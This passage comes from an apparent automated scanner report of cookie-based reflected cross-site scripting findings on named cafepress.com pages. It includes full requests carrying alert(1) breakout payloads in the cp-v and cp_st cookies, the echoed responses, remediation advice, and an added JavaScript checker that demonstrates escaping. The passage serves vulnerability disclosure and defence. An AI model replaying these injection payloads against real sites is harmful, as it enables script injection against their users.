cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAc1c6c"-alert(1)-"3104c288fc9 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 54488
Date: Sun, 26 Dec 2010 13:48:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 54488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";
s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAc1c6c"-alert(1)-"3104c288fc9 ";
s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
if (s.eVar26 == "") {
if ("" == "affiliate") {
s.eVar26 = "2099"; //2099 = affiliate
} el...[SNIP]...
1.97. http://www.cafepress.com/make/birth-announcements [cp_st cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/birth-announcements
Issue detail
The value of the cp_st cookie is copied into a JavaScript string encapsulated in single quotation marks: the assignment window.cafepress.tealeaf.searchTerm = '<cp_st value> ' in the inline script shown in the response below. The payload 7b100</script><script>alert(1)</script>01efe3e9555 was submitted in the cp_st cookie and was echoed unmodified. The HTML parser closes a script element at the first </script> regardless of JavaScript quoting, so the payload terminates the original script block and starts a new one; the single quotes around the string offer no protection. This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Because the injected data arrives in a cookie, the behaviour is not trivial to exploit against another user: an attacker first needs a means of setting an arbitrary cp_st cookie in the victim's browser. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. cp_st carries a free-text search term, so format validation alone cannot make it safe: the value must be JavaScript-string-escaped (at minimum ", ', \, <, >, / and line terminators encoded as \uXXXX) where it is written into window.cafepress.tealeaf.searchTerm, or passed to the page as a JSON value in a data attribute and read from the DOM rather than embedded in inline script.
Request
GET /make/birth-announcements HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=7b100</script><script>alert(1)</script>01efe3e9555 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 54510
Date: Sun, 26 Dec 2010 13:48:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 54510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
omain_us = 'cafepress.com';
window.cafepress.originCountryCode = 'US'
window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = '7b100</script><script>alert(1)</script>01efe3e9555 '
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
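Confirmation check for findings 1.96 and 1.97, as an added editor example (not part of the XSS.CX report and not CafePress code). It replays the scanner's reasoning on constructed response excerpts modelled on the two responses above: it locates the payload, decides whether it sits inside a <script> element, and whether it breaks out of the enclosing string literal (the cp-v case, via ") or out of the script element itself (the cp_st case, via </script>). It then applies the \uXXXX JavaScript-string encoding the remediation calls for and shows that the raw payload no longer appears in the page while a JS engine still decodes the literal back to the original cookie value. The function names, the sample markup and the safe rendering helper are the editor's assumptions; only the sink names s.eVar30 and window.cafepress.tealeaf.searchTerm and the payloads come from the report.

```javascript
// Added example for findings 1.96 and 1.97. Editor-written; not part of the
// XSS.CX report and not CafePress code. Response excerpts below are constructed
// from the snippets in the report, trimmed to the statements around the sink.

// Quoting state of a stretch of JavaScript source at its end:
// null = plain code, '"' or "'" = inside that string literal.
// Deliberately small: it tracks backslash escapes but not comments, regex
// literals or template strings, which is enough for the inline blocks here.
function quoteStateAt(src) {
  let quote = null;
  for (let i = 0; i < src.length; i++) {
    const c = src[i];
    if (quote) {
      if (c === '\\') { i++; continue; }   // skip the escaped character
      if (c === quote) quote = null;
    } else if (c === '"' || c === "'") {
      quote = c;
    }
  }
  return quote;
}

// Locate `payload` in `body` and classify the context it landed in.
function confirmReflection(body, payload) {
  const idx = body.indexOf(payload);
  if (idx === -1) return { reflected: false, context: 'none', breakout: false, via: null };

  const open = body.lastIndexOf('<script', idx);
  const openEnd = open === -1 ? -1 : body.indexOf('>', open) + 1;
  const close = open === -1 ? -1 : body.indexOf('</script', openEnd);
  // Outside any <script> element: no opening tag before the payload, or the
  // first </script> after that opening tag comes before the payload.
  if (open === -1 || (close !== -1 && close < idx)) {
    return { reflected: true, context: 'html', breakout: false, via: null };
  }
  // The HTML parser ends a script element at the first "</script" no matter
  // how the JavaScript is quoted, so this breakout works in any string context.
  if (/<\/script/i.test(payload)) {
    return { reflected: true, context: 'script', breakout: true, via: '</script>' };
  }
  const quote = quoteStateAt(body.slice(openEnd, idx));
  if (quote === null) {
    return { reflected: true, context: 'script-code', breakout: true, via: 'unquoted' };
  }
  const breakout = payload.includes(quote);
  return {
    reflected: true,
    context: quote === '"' ? 'script-string-double' : 'script-string-single',
    breakout,
    via: breakout ? quote : null,
  };
}

// Remediation: encode every character outside a small safe set as \uXXXX so the
// value can sit inside a '...' or "..." literal without ending the literal or
// the script element.
function jsStringEscape(s) {
  return s.replace(/[^A-Za-z0-9 ,._-]/g, (c) =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// The cp_st sink from the report, rendered the safe way (assumed helper).
function renderSearchTermSafely(cookieValue) {
  return "<script>window.cafepress = { tealeaf: {} };" +
    " window.cafepress.tealeaf.searchTerm = '" + jsStringEscape(cookieValue) + "';</script>";
}

// Round-trip check: a JS engine decodes the escaped literal back to the original.
function decodeLiteral(escaped) {
  return new Function('return "' + escaped + '";')();
}

// Constructed sample data (modelled on the report, not captured traffic).
const CPV_PAYLOAD = 'c1c6c"-alert(1)-"3104c288fc9';
const CPV_RESPONSE = '<html><script type="text/javascript">' +
  's.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA' +
  CPV_PAYLOAD + ' "; s.eVar26 = "";</script></html>';

const CPST_PAYLOAD = '7b100</script><script>alert(1)</script>01efe3e9555';
const CPST_RESPONSE = '<html><script type="text/javascript">' +
  "window.cafepress.tealeaf.pageLandingType = 'Make' " +
  "window.cafepress.tealeaf.searchTerm = '" + CPST_PAYLOAD + " ' " +
  "window.cafepress.tealeaf.salesChannel = 'Make'</script></html>";

console.log(confirmReflection(CPV_RESPONSE, CPV_PAYLOAD));
console.log(confirmReflection(CPST_RESPONSE, CPST_PAYLOAD));
console.log(confirmReflection(renderSearchTermSafely(CPST_PAYLOAD), CPST_PAYLOAD));
```

Run with node; the three console.log lines print the classification of each excerpt (string breakout via " for cp-v, element breakout via </script> for cp_st, and no reflection of the raw payload once the value is escaped). The quote tracker deliberately ignores comments, regex and template literals, which is enough for the inline assignments in these responses but would need extending for arbitrary scripts.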
1.98. http://www.cafepress.com/make/custom-baby-gear [cp-v cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-baby-gear
Issue detail
The value of the cp-v cookie is copied into a JavaScript string encapsulated in double quotation marks: the Omniture variable assignment s.eVar30 = "...:<cp-v value> " in the inline script shown in the response below. The payload 505c2"-alert(1)-"362de5625b3 was submitted appended to the baseline cp-v value and was echoed unmodified, so the double quote ends the string literal and -alert(1)- is evaluated as JavaScript. This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Because the injected data arrives in a cookie, the behaviour is not trivial to exploit against another user: an attacker first needs a means of setting an arbitrary cp-v cookie in the victim's browser. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-baby-gear HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA505c2"-alert(1)-"362de5625b3 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW19
Cteonnt-Length: 71179
Date: Sun, 26 Dec 2010 13:48:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 71179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";
s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA505c2"-alert(1)-"362de5625b3 ";
s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
if (s.eVar26 == "") {
if ("" == "affiliate") {
s.eVar26 = "2099"; //2099 = affiliate
} el...[SNIP]...
1.99. http://www.cafepress.com/make/custom-baby-gear [cp_st cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-baby-gear
Issue detail
The value of the cp_st cookie is copied into a JavaScript string encapsulated in single quotation marks: the assignment window.cafepress.tealeaf.searchTerm = '<cp_st value> ' in the inline script shown in the response below. The payload 8caa8</script><script>alert(1)</script>49b69bc8c1b was submitted in the cp_st cookie and was echoed unmodified. The HTML parser closes a script element at the first </script> regardless of JavaScript quoting, so the payload terminates the original script block and starts a new one; the single quotes around the string offer no protection. This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Because the injected data arrives in a cookie, the behaviour is not trivial to exploit against another user: an attacker first needs a means of setting an arbitrary cp_st cookie in the victim's browser. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-baby-gear HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=8caa8</script><script>alert(1)</script>49b69bc8c1b ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 71207
Date: Sun, 26 Dec 2010 13:48:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 71207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
omain_us = 'cafepress.com';
window.cafepress.originCountryCode = 'US'
window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = '8caa8</script><script>alert(1)</script>49b69bc8c1b '
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.100. http://www.cafepress.com/make/custom-buttons [cp-v cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-buttons
Issue detail
The value of the cp-v cookie is copied into a JavaScript string encapsulated in double quotation marks: the Omniture variable assignment s.eVar30 = "...:<cp-v value> " in the inline script shown in the response below. The payload d08c3"-alert(1)-"5c9b7d83b0c was submitted appended to the baseline cp-v value and was echoed unmodified, so the double quote ends the string literal and -alert(1)- is evaluated as JavaScript. This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Because the injected data arrives in a cookie, the behaviour is not trivial to exploit against another user: an attacker first needs a means of setting an arbitrary cp-v cookie in the victim's browser. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-buttons HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAd08c3"-alert(1)-"5c9b7d83b0c ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 54737
Date: Sun, 26 Dec 2010 13:48:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 54737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";
s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAd08c3"-alert(1)-"5c9b7d83b0c ";
s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
if (s.eVar26 == "") {
if ("" == "affiliate") {
s.eVar26 = "2099"; //2099 = affiliate
} el...[SNIP]...
1.101. http://www.cafepress.com/make/custom-buttons [cp_st cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-buttons
Issue detail
The value of the cp_st cookie is copied into a JavaScript string encapsulated in single quotation marks: the assignment window.cafepress.tealeaf.searchTerm = '<cp_st value> ' in the inline script shown in the response below. The payload 467e9</script><script>alert(1)</script>f97ce1fac6a was submitted in the cp_st cookie and was echoed unmodified. The HTML parser closes a script element at the first </script> regardless of JavaScript quoting, so the payload terminates the original script block and starts a new one; the single quotes around the string offer no protection. This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Because the injected data arrives in a cookie, the behaviour is not trivial to exploit against another user: an attacker first needs a means of setting an arbitrary cp_st cookie in the victim's browser. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
